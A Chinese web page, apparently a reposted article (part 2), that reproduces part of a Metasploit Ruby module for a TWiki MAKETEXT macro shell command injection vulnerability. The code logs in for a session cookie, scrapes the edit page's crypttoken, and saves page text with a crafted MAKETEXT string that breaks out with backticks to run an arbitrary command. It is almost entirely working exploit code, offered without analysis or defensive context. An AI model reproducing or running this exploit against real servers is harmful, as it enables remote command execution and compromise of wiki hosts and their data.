TWiki twiki/lib/TWiki.pm MAKETEXT宏任意shell命令注入漏洞(2)

register_options(
            [
                OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]),
                OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),
                OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
                OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
            ], self.class)
    end

def do_login(username, password)
        res = send_request_cgi({
            'method'  => 'POST',
            'uri'      => "#{@base}do/login",
            'vars_post' =>
                {
                    'username' => username,
                    'password' => password
                }
            })

if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/
            return nil
        end

session = $1
        return session
    end

def inject_code(session, code)

vprint_status("Retrieving the crypttoken...")

res = send_request_cgi({
            'uri'      => "#{@base}do/edit#{@page}",
            'cookie'  => "TWIKISID=#{session}",
            'vars_get' =>
                {
                    'nowysiwyg' => '1'
                }
        })

if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/
            vprint_error("Error retrieving the crypttoken")
            return nil
        end

crypttoken = $1
        vprint_good("crypttoken found: #{crypttoken}")

if session.empty?
            if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/
                session = $1
            else
                vprint_error("Error using anonymous access")
                return nil
            end
        end

vprint_status("Injecting the payload...")

res = send_request_cgi({
            'method'  => 'POST',
            'uri'      => "#{@base}do/save#{@page}",
            'cookie'  => "TWIKISID=#{session}",
            'vars_post' =>
            {
                'crypttoken' => crypttoken,
                'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%"
            }
        })

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygjzp.html